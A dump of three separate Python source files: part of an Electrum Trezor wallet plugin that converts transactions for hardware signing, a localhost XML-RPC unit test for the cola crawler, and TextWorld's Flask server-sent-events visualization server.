        signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
        raw = bh2u(signed_tx)
        tx.update_signatures(raw)

    def show_address(self, wallet, address, keystore=None):
        """Display *address* on the device screen (single-sig or multisig)."""
        if keystore is None:
            keystore = wallet.get_keystore()
        if not self.show_address_helper(wallet, address, keystore):
            return
        client = self.get_client(keystore)
        if not client.atleast_version(1, 3):
            keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) == 1:
            script_gen = keystore.get_script_gen()
            script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
            client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
        else:
            def f(xpub):
                # Wrap each cosigner xpub with the (change, index) suffix.
                node = self.ckd_public.deserialize(xpub)
                return self.types.HDNodePathType(node=node, address_n=[change, index])
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
            pubkeys = list(map(f, sorted_xpubs))
            multisig = self.types.MultisigRedeemScriptType(
                pubkeys=pubkeys,
                signatures=[b''] * wallet.n,
                m=wallet.m,
            )
            script_gen = keystore.get_script_gen()
            script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
            client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)

    def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
        """
        Convert electrum tx inputs into firmware TxInputType messages.

        When for_sig is True the inputs carry derivation paths / multisig data
        so the device can sign; otherwise only the outpoint data is filled in
        (used for previous transactions).
        """
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = "\0"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # Single-sig: attach our full derivation path.
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype._extend_address_n(xpub_n + s)
                        txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
                    else:
                        def f(x_pubkey):
                            # Build an HDNodePathType for each cosigner key.
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                            else:
                                xpub = xpub_from_pubkey(0, bfh(x_pubkey))
                                s = []
                            node = self.ckd_public.deserialize(xpub)
                            return self.types.HDNodePathType(node=node, address_n=s)
                        pubkeys = list(map(f, x_pubkeys))
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
                            m=txin.get('num_sig'),
                        )
                        script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
                        txinputtype = self.types.TxInputType(
                            script_type=script_type,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype._extend_address_n(xpub_n + s)
                                    break
                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']
            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index
            if txin.get('scriptSig') is not None:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig
            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
            inputs.append(txinputtype)
        return inputs

    def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
        """
        Convert electrum tx outputs into firmware TxOutputType messages.

        Outputs the wallet can derive (change) are described by path so the
        device hides them from the user; all others are sent by address.
        """
        def create_output_by_derivation(info):
            # Output belongs to this wallet: describe it via derivation path.
            index, xpubs, m = info
            if len(xpubs) == 1:
                if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOWITNESS
                elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
                else:
                    script_type = self.types.OutputScriptType.PAYTOADDRESS
                address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
                txoutputtype = self.types.TxOutputType(
                    amount=amount,
                    script_type=script_type,
                    address_n=address_n,
                )
            else:
                if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOWITNESS
                elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
                else:
                    script_type = self.types.OutputScriptType.PAYTOMULTISIG
                address_n = self.client_class.expand_path("/%d/%d" % index)
                nodes = map(self.ckd_public.deserialize, xpubs)
                pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
                multisig = self.types.MultisigRedeemScriptType(
                    pubkeys=pubkeys,
                    signatures=[b''] * len(pubkeys),
                    m=m)
                txoutputtype = self.types.TxOutputType(
                    multisig=multisig,
                    amount=amount,
                    address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                    script_type=script_type)
            return txoutputtype

        def create_output_by_address():
            # External output: describe it by address (or OP_RETURN payload).
            txoutputtype = self.types.TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
                txoutputtype.op_return_data = address[2:]
            elif _type == TYPE_ADDRESS:
                txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
                txoutputtype.address = address
            return txoutputtype

        def is_any_output_on_change_branch():
            for _type, address, amount in tx.outputs():
                info = tx.output_info.get(address)
                if info is not None:
                    index, xpubs, m = info
                    if index[0] == 1:
                        return True
            return False

        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_output_on_change_branch()
        for _type, address, amount in tx.outputs():
            use_create_by_derivation = False
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info
                on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                # note: ^ restriction can be removed once we require fw
                # that has https://github.com/trezor/trezor-mcu/pull/306
                if on_change_branch == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True
            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation(info)
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)
        return outputs

    def electrum_tx_to_txtype(self, tx):
        """Convert an electrum Transaction into a firmware TransactionType (or an empty one for None)."""
        t = self.types.TransactionType()
        if tx is None:
            # probably for segwit input and we don't need this prev txn
            return t
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t._extend_inputs(inputs)
        for vout in d['outputs']:
            o = t._add_bin_outputs()
            o.amount = vout['value']
            o.script_pubkey = bfh(vout['scriptPubKey'])
        return t

    # This function is called from the TREZOR libraries (via tx_api)
    def get_tx(self, tx_hash):
        """Return the previous transaction *tx_hash* in firmware message form."""
        tx = self.prev_tx[tx_hash]
        return self.electrum_tx_to_txtype(tx)
|
test_rpc.py | '''
Copyright (c) 2013 Qin Xuye <qin@qinxuye.me>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on 2013-5-23
@author: Chine
'''
from __future__ import with_statement
import unittest
import xmlrpclib
import random
import socket
import threading
from cola.core.rpc import ColaRPCServer
def test_plus_one(num):
return num + 1
class Test(unittest.TestCase):
    """Round-trip test for ColaRPCServer using a background server thread."""

    def client_call(self):
        """Call test_plus_one over XML-RPC and check the result."""
        server = xmlrpclib.ServerProxy('http://localhost:11103')
        num = random.randint(0, 100)
        plus_one_num = server.test_plus_one(num)
        self.assertEqual(plus_one_num, num + 1)

    def start_server(self):
        """Thread target: serve test_plus_one on localhost:11103 until shutdown()."""
        self.server = ColaRPCServer(('localhost', 11103))
        self.server.register_function(test_plus_one)
        self.server.serve_forever()

    def setUp(self):
        # The server thread is created here but only started inside testRPC.
        self.server_run = threading.Thread(target=self.start_server)

    def testRPC(self):
        self.server_run.start()
        # NOTE(review): no synchronization between starting the server thread
        # and the first client call — presumably bind+serve wins the race in
        # practice, but this is inherently flaky; confirm before relying on it.
        self.client_call()
        self.server.shutdown()
        del self.server
        # After shutdown the connection attempt should fail at socket level.
        with self.assertRaises(socket.error):
            self.client_call()
if __name__ == "__main__":
    # Run the unittest test runner for this module.
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
serve.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
"""
Creates server for streamed game state
"""
import os
import json
import logging
import textwrap
from os.path import join as pjoin
from multiprocessing import Process, Pipe
from multiprocessing.connection import Connection
from threading import Thread
from queue import Queue
from textworld.core import GameState
from textworld.utils import check_modules
import textworld.render
# Try importing optional libraries.
# Each missing module's name is collected so check_modules() can raise a
# helpful error only when a feature that needs it is actually used.
missing_modules = []
try:
    import webbrowser
except ImportError:
    missing_modules.append("webbrowser")
try:
    import flask
    from flask import Flask, request
except ImportError:
    missing_modules.append("flask")
try:
    import gevent
    from gevent import pywsgi
except ImportError:
    missing_modules.append("gevent")
try:
    import pybars
except ImportError:
    missing_modules.append("pybars")

# Directory holding the handlebars templates and static assets shipped with the package.
WEB_SERVER_RESOURCES = pjoin(os.path.abspath(os.path.dirname(__file__)), "tmpl")
def get_html_template(game_state=None):
    """
    Load the slideshow Handlebars template, optionally rendering it.

    :param game_state: optional game-state payload; when None the compiled
        template object itself is returned.
    :return: the compiled template (game_state is None) or the rendered HTML.
    """
    check_modules(["pybars"], missing_modules)
    # read in template
    compiler = pybars.Compiler()
    # Read as UTF-8 explicitly: the template ships with the package and may
    # contain non-ASCII glyphs; the platform default encoding is not reliable.
    with open(pjoin(WEB_SERVER_RESOURCES, 'slideshow.handlebars'), 'r', encoding='utf-8') as f:
        contents = f.read()
    template = compiler.compile(contents)
    if game_state is None:
        return template
    html = template({
        'game_state': game_state,
        'template_path': WEB_SERVER_RESOURCES,
    })
    return html
class ServerSentEvent:
    """Serialize a payload into a text/event-stream (SSE) frame."""

    def __init__(self, data: any):
        """
        Object helper to parse data into SSE wire format.

        :param data: payload for the SSE ``data:`` field
        """
        self.data = data
        self.event = None  # optional SSE "event" name, may be set after construction
        self.id = None     # optional SSE "id" field, may be set after construction
        # Kept for backward compatibility with the original attribute set.
        # NOTE: this snapshot maps *values* to field names, so it went stale
        # whenever .event/.id were assigned after construction (their entries
        # were keyed on None); encode() now reads the attributes directly.
        self.desc_map = {
            self.data: "data",
            self.event: "event",
            self.id: "id"
        }

    def encode(self):
        """Return the wire-format frame, or "" when there is no data."""
        if not self.data:
            return ""
        # Read current attribute values so fields assigned after __init__
        # (event, id) are included; falsy fields are omitted.
        fields = (("data", self.data), ("event", self.event), ("id", self.id))
        lines = ["%s: %s" % (name, value) for name, value in fields if value]
        return "%s\n\n" % "\n".join(lines)
class SupressStdStreams:
    """Context manager that silences stdout/stderr at the file-descriptor level."""

    def __init__(self):
        """
        For suppressing the standard output streams (fd 1 and fd 2).
        """
        # Two /dev/null descriptors: one to stand in for stdout, one for stderr.
        self._null_fds = [os.open(os.devnull, os.O_RDWR) for _ in range(2)]
        # Duplicates of the real stdout (fd 1) and stderr (fd 2) so they can
        # be restored on exit.
        self._save_fds = [os.dup(1), os.dup(2)]

    def __enter__(self):
        # Point fd 1 and fd 2 at /dev/null.
        os.dup2(self._null_fds[0], 1)
        os.dup2(self._null_fds[1], 2)

    def __exit__(self, *_):
        # Restore the original descriptors first, then close everything we
        # created (both the null fds and the saved duplicates).
        os.dup2(self._save_fds[0], 1)
        os.dup2(self._save_fds[1], 2)
        for fd in self._null_fds + self._save_fds:
            os.close(fd)
def find_free_port(port_range):
    """
    Return the first port in *port_range* that can be bound.

    :param port_range: iterable of candidate port numbers.
    :raises ValueError: when no candidate port is bindable.
    """
    import socket
    from contextlib import closing

    for candidate in port_range:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        with closing(sock):
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sock.bind(("0.0.0.0", candidate))
            except socket.error:
                # Port already in use (or not bindable) — try the next one.
                continue
            return sock.getsockname()[1]
    raise ValueError("Could not find any available port.")
class VisualizationService:
    """
    Server for visualization.
    We instantiate a new process for our flask server, so our game can send updates to
    the server. The server instantiates new gevent Queues for every connection.
    """

    def __init__(self, game_state: GameState, open_automatically: bool):
        """
        :param game_state: initial game state used to seed the viewer.
        :param open_automatically: when True, open a browser tab in start().
        """
        self.prev_state = None
        self.command = None
        self._process = None  # the flask server Process, created in start()
        state_dict = textworld.render.load_state_from_game_state(game_state)
        # Running HTML transcript shown in the viewer; starts with the objective.
        self._history = '<p class="objective-text">{}</p>'.format(game_state.objective.strip().replace("\n", "<br/>"))
        # ASCII-art banner prepended to the first feedback block.
        # NOTE(review): the art's internal spacing looks collapsed in this copy
        # of the file (whitespace-mangled) — verify against upstream before
        # assuming the literal below is correct.
        banner = textwrap.dedent(r"""
        ________ __ __
        | \| \ _ | \
        \$$$$$$$$| $$ / \ | $$
        | $$ | $$/ $\| $$
        | $$ | $$ $$$\ $$
        | $$ | $$ $$\$$\$$
        | $$ | $$$$ \$$$$
        | $$ | $$$ \$$$
        \$$ \$$ \$$
        """)  # noqa: W605
        # Everything after the objective in the initial feedback text.
        feedback = game_state.feedback.split(game_state.objective, 1)[-1]
        # NOTE(review): the replace() below appears to substitute a space with
        # a space in this copy; upstream this was presumably a non-breaking
        # space to preserve the banner alignment in HTML — confirm.
        initial_description = banner.replace(" ", " ") + feedback
        self._history += '<p class="feedback-text">{}</p>'.format(initial_description.strip().replace("\n", "<br/>"))
        state_dict["history"] = self._history
        state_dict["command"] = ""
        # Pipe used to push state updates from the game into the server process.
        self.parent_conn, self.child_conn = Pipe()
        self.game_state = state_dict
        self.open_automatically = open_automatically

    def start_server(self, game_state: dict, port: int, child_conn: Connection):
        """
        Function for starting a new server on a new process.

        :param game_state: initial game state from load
        :param port: port to run server
        :param child_conn: child connection from multiprocessing.Pipe
        """
        server = Server(game_state, port)
        server.start(child_conn)

    def start(self, parent_thread: Thread, port: int) -> None:
        """
        Start visualization server on a new process.

        :param parent_thread: the parent thread that called start.
        :param port: Port to run visualization on.
        """
        def wait_task():
            # When the caller's thread finishes, tear down the server process too.
            parent_thread.join()
            self.stop_server()

        # Check if address is available.
        self.port = find_free_port(range(port, port + 100))
        self._process = Process(target=self.start_server, name='flask', args=(self.game_state, self.port, self.child_conn))
        self._process.start()
        thread = Thread(target=wait_task, name='waiting_on_parent_exit')
        thread.start()
        self.parent_conn.recv()  # Wait until server is ready.
        print("Viewer started at http://localhost:{}.".format(self.port))
        if self.open_automatically:
            check_modules(["webbrowser"], missing_modules)
            # Silence the noise some browsers print to stdout/stderr on launch.
            with SupressStdStreams():
                webbrowser.open("http://localhost:{}/".format(self.port))

    def update_state(self, game_state: GameState, command: str):
        """
        Propagate a state update to the server.
        We use a multiprocessing.Pipe to pass state into the flask process.

        :param game_state: Glulx game state.
        :param command: previous command
        """
        state_dict = textworld.render.load_state_from_game_state(game_state)
        # Append the executed command and its feedback to the HTML transcript.
        self._history += '<p class="command-text">> {}</p>'.format(command)
        self._history += '<p class="feedback-text">{}</p>'.format(game_state.feedback.strip().replace("\n", "<br/>"))
        state_dict["command"] = command
        state_dict["history"] = self._history
        self.parent_conn.send(state_dict)

    def stop_server(self):
        """Terminate the flask server process."""
        self._process.terminate()
class Server:
    """
    Visualization server.
    Uses Server-sent Events to update game_state for visualization.
    """

    def __init__(self, game_state: dict, port: int):
        """
        Note: Flask routes are defined in app.add_url_rule in order to
        call `self` in routes.

        :param game_state: game state returned from load_state_from_game_state
        :param port: port to run visualization on
        """
        check_modules(["gevent", "flask"], missing_modules)
        super().__init__()
        # disabling loggers
        log = logging.getLogger('werkzeug')
        log.disabled = True
        self.port = port
        self.results = Queue()   # thread-safe queue fed by listen()
        self.subscribers = []    # one gevent queue per connected SSE client
        self.game_state = game_state
        self.app = Flask(__name__, static_folder=pjoin(WEB_SERVER_RESOURCES, 'static'))
        self.app.add_url_rule('/', 'index', self.index)
        self.app.add_url_rule('/subscribe', 'subscribe', self.subscribe)
        self.slideshow_template = get_html_template()

    def start(self, child_conn: Connection):
        """ Starts the WSGI server and listens for updates on a separate thread.

        :param child_conn: Child connection from `multiprocessing.Pipe`.
        """
        thread = Thread(target=self.listen, name='updates', args=(child_conn, self.results))
        thread.start()
        # Blocks here serving requests until the process is terminated.
        server = pywsgi.WSGIServer(("0.0.0.0", self.port), self.app, log=None)
        server.serve_forever()

    @staticmethod
    def listen(conn: Connection, results: Queue):
        """
        Listener for updates. Runs on a separate thread.

        :param conn: child connection from multiprocessing.Pipe.
        :param results: thread-safe queue for results.
        """
        conn.send("Ready!")  # Tell the main thread the server is ready.
        while True:
            game_state = conn.recv()
            results.put(game_state)

    def update_subscribers(self, game_state: dict):
        """
        Updates all subscribers and updates their data.
        This is for multiple subscribers on the visualization service.

        :param game_state: parsed game_state from load_state_from_game_state
        """
        def notify():
            self.game_state = game_state
            if len(self.subscribers) == 0:
                print("We have no subscribers!")
            else:
                # Iterate a copy since subscribers may change concurrently.
                for q in self.subscribers[:]:
                    q.put(game_state)
        gevent.spawn(notify)

    def index(self) -> str:
        """
        Index route ("/").
        Returns HTML template processed by handlebars.

        :return: Flask response object
        """
        output = self.slideshow_template({
            'game_state': json.dumps(self.game_state),
            'template_path': 'http://' + request.host
        })
        resp = flask.Response(output.encode('utf-8'))
        resp.headers['Content-Type'] = 'text/html;charset=utf-8'
        return resp

    def gen(self):
        """
        Our generator for listening for updated state.

        NOTE(review): results.get_nowait() raises queue.Empty when no update
        is pending; that exception is swallowed by the bare `except Exception`
        below and ENDS this generator (closing the SSE stream) rather than
        "keep polling" as originally described — confirm this is the intended
        behavior before relying on long-lived streams.

        :return: yields event-stream encoded data.
        """
        q = gevent.queue.Queue()
        self.subscribers.append(q)
        try:
            while True:
                self.update_subscribers(self.results.get_nowait())
                result = q.get()
                ev = ServerSentEvent(json.dumps(result))
                yield ev.encode()
        except Exception:
            pass

    def subscribe(self):
        """
        Our Server-sent Event stream route.

        :return: A stream
        """
        return flask.Response(self.gen(), mimetype='text/event-stream')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.